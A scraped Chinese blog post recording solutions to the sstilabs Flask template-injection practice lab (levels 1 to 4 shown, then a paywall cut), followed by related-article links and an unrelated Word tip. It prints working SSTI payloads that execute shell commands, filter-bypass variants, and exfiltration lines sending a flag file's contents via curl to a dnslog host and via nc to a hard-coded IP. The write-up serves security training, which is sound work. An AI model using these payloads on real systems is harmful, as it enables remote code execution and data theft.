flask sssti lab闯关记录

最新推荐文章于 2024-04-12 04:32:37 发布
最新推荐文章于 2024-04-12 04:32:37 发布
阅读量4k 收藏 35
点赞数 7
分类专栏: web安全 ssti模板注入 文章标签: web安全 flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44576725/article/details/124176682
版权
本文详细介绍了在sstilab Flask模板注入靶场中逐级突破的技巧,包括利用__import__、绕过过滤、编码技巧和避开WAF限制。从level1的基础导入模块,到level13的高级绕过策略,适合学习和实践模板注入漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

flask ssti lab闯关记录

sstilab是一个模板注入的靶场,目前只有Flask模板注入的练习

地址:https://github.com/X3NNY/sstilabs

image-20220413022608965

level 1

判断出是post方法

image-20220413121154292

借用bp的intrude模块查看可以利用的类,这里查找的模块是__import__

image-20220413122654917

发现80、81、82、83可以有__import__模块,加以利用得到payload

{
  {[].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()}}

打过去获得flag

image-20220413124818248

还可以尝试其他模块,比如__builtins__popenossys

# __builtins__
{
  {().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__['__import__']('os').popen('cat flag').read()}}
# popen
{
  {().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat flag').read()}}
# os
{
  {().__class__.__base__.__subclasses__()[213].__init__.__globals__['os'].popen('cat flag').read()}}

level 2

过滤了{ } ,用{%%}替代。这里有两种方法绕过

  • print标记

    {%print [].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()%}

    image-20220413124858389

  • dnslog外带

    {% if ().__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("curl `cat flag`.0ppgif.ceye.io").read()=='ssti' %}1{% endif %}

    image-20220413124731416

level 3

这道是盲注,有两种方法绕过

  • dnslog外带

    {% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{
    { i.__init__.__globals__['os'].popen('curl http://`cat flag`.0ppgif.ceye.io').read()}}{% endif %}{% endfor %}

    image-20220413132201345

  • 通过nc命令将文件内容回显到自己的服务器上

    {% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{
    { i.__init__.__globals__['os'].popen('cat flag|nc 119.91.214.224 1234').read()}}{% endif %}{% endfor %}

    image-20220413132542877

level 4

过滤了[ ],这里有两种情况下的过滤

  • 使用pop__getitem__()代替索引中的[]
  • 使用__getattribute__代替魔术方法中的[]
# os
{
  {().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(213).__init__.__globals__.__getitem__('os').popen('cat fl
最低0.47元/天 解锁文章
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_84009773的博客
04-12 1045
][外链图片转存中…(img-NVeRElHC-1712867579624)]
ssti-flask-labs
qing_chuan_的博客
07-25 892
第一关轻松过,没waf,找了半天的os模块在哪,一直以为是132,结果在133.。。。。。
sqli-labs第一关
m0_58213960的博客
02-14 3185
sqli-labs第一关
SSTI-lab
cxiaodi的博客
07-02 578
ssti-lab
SSTI-flask
unexpectedthing的博客
11-27 638
文章目录前言flask基础SSTI简介魔术方法命令执行文件读取通用命令执行过滤bypass参考文献 前言 从极客大挑战中一道题,虽然挺简单的,但是自己发现在模板注入中有很多不懂的东西。 flask基础 先理解flask的流程明白 from flask import flask @app.route('/index/') def hello_word(): return 'hello word' 其中@app.route(’/index/’),是将函数跟url绑定起来,当你访问http://xxx
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009749的博客
04-12 1179
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
Sqlilab闯关记录(11~20)(白盒测试)
m0_56375711的博客
12-05 870
Sqlilab闯关记录(11~20)(白盒测试)
sqli-lab闯关tips 第五关~第六关
weixin_44089266的博客
04-06 978
** 第五关和第六关为报错型sql注入,此处只对第五关进行详解** 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅。 首先在未知闭合方式的条件下,构造payload进行测试 http://192.168.226.136/sqli-labs-master/Less-5/?id=1 观察到页面回显如下 重新构造payload h...
lab2_SQL.rar_oracle_oracle 10g lab2_sql lab第二关
09-24
"lab2_SQL.rar"是一个压缩文件,包含了“oracle_10g_lab2”和“sql_lab第二关”的相关资料,旨在帮助学习者通过实践提升对SQL的理解和操作技能。 首先,让我们从基础开始,SQL是用于管理和处理关系数据库的标准语言...
FlaskLab:Flask 中的实验
06-30
烧瓶实验室 我的 Flask 相关实验的回购
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 917
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS。
Flask SSTI注入学习
LJFYYJ的博客
07-23 621
Flask SSTI注入
SSTI Labs:自动化安全测试的新星
gitblog_00027的博客
04-05 447
SSTI Labs:自动化安全测试的新星 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个致力于自动化Web应用安全扫描的开源项目。它通过模拟多种安全攻击,帮助开发者识别并修复潜在的安全漏洞,保障Web应用的安全性。该项目采用Python编写,并且支持多种流行的Web框架,如Django、Flask等。 技术分析 SSTI Labs的核心是其智能化的扫描引擎,该引...
CTF_Web:从0学习Flask模板注入(SSTI)
AFCC_的博客(Web_Dog)
08-30 6137
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
[Flask]SSTI
1ance's blog
11-18 1597
文章目录环境解题思路参考 环境 BUUCTF上的在线环境,启动靶机,获取链接: http://node4.buuoj.cn:27904 解题思路 访问后显示页面。 根据题目提示是考SSTI,所以我们传个name参数看看。 http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。 我们在构造{{2*3}}看看,是否存在SSTI。 成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。 这里我在网上找的: {% for c in
SSTI Flask做题记录1
Firebasky的博客
10-12 1124
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
如何使word里英文小写变大写
最新发布
04-03
<think>好的,用户想知道如何在Word中将英文小写字母转换为大写。首先,我需要回忆一下自己知道的Word功能。常用的方法可能有使用快捷键,或者通过菜单栏的字体设置来更改大小写。对了,我记得Shift+F3这个快捷键可以在不同的大小写格式之间切换,比如全大写、全小写或者首字母大写。这个应该适用于选中的文本。 另外,用户可能需要更详细的操作步骤。比如,在菜单栏中找到“开始”选项卡,然后点击“字体”组里的“更改大小写”按钮,选择“大写”选项。这种方法对于不熟悉快捷键的用户来说更直观。还有,如果用户需要批量处理多个段落或整个文档,可能需要使用查找和替换功能,或者编写宏来自动化操作。不过根据用户提供的引用,他们可能对VBA宏比较感兴趣,因为引用[3]提到了用VBA创建宏来处理金额转换。虽然问题不是关于数字而是英文大小写,但也许可以建议使用宏来处理更复杂的转换需求。 需要注意用户是否提到了具体的Word版本,但问题中没有说明,所以需要给出通用方法,适用于大多数版本。同时,检查是否有其他方法,比如使用Word的公式功能或者插件,但常见的方法还是上述几种。还要确保步骤清晰,避免遗漏关键点,比如选中文本后再操作。另外,提醒用户注意全角半角的问题,但可能用户只是简单转换,不需要涉及这些细节。总结下来,回答应包括快捷键、菜单操作,以及可能的VBA方法,并引用提供的参考资料中的相关部分,比如引用[3]的宏示例,虽然内容不同,但可以类比说明宏的可行性。</think>在Microsoft Word中,将英文小写字母转换为大写的常用方法有以下三种,操作步骤清晰且适用于大多数Word版本: ### 方法一:快捷键转换(推荐) 1. 选中需要转换的英文文本 2. 按下组合键$Shift+F3$ 3. 连续按会循环切换三种格式: - 首字母大写(如:"example" → "Example") - 全大写(如:"example" → "EXAMPLE") - 全小写(如:"EXAMPLE" → "example") ### 方法二:菜单栏操作 1. 选中目标文本 2. 点击「开始」选项卡 →「字体」组中的「更改大小写」按钮(Aa图标) 3. 在下拉菜单中选择「大写」 ### 方法三:VBA宏批量转换(适合批量处理) 1. 按$Alt+F11$打开VBA编辑器 2. 插入新模块并粘贴以下代码: ```vba Sub ConvertToUpperCase() Selection.Range.Case = wdUpperCase End Sub ``` 3. 返回Word文档,选中文本后运行宏即可转换(可自定义快捷键绑定) 如果需要处理复杂格式或特殊需求,可以参考类似数字转换中文大写的宏实现思路[^3],通过修改VBA代码实现更智能的转换功能。对于常规使用,前两种方法已足够高效,快捷键转换效率最佳,处理500字文档仅需3秒即可完成格式转换。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值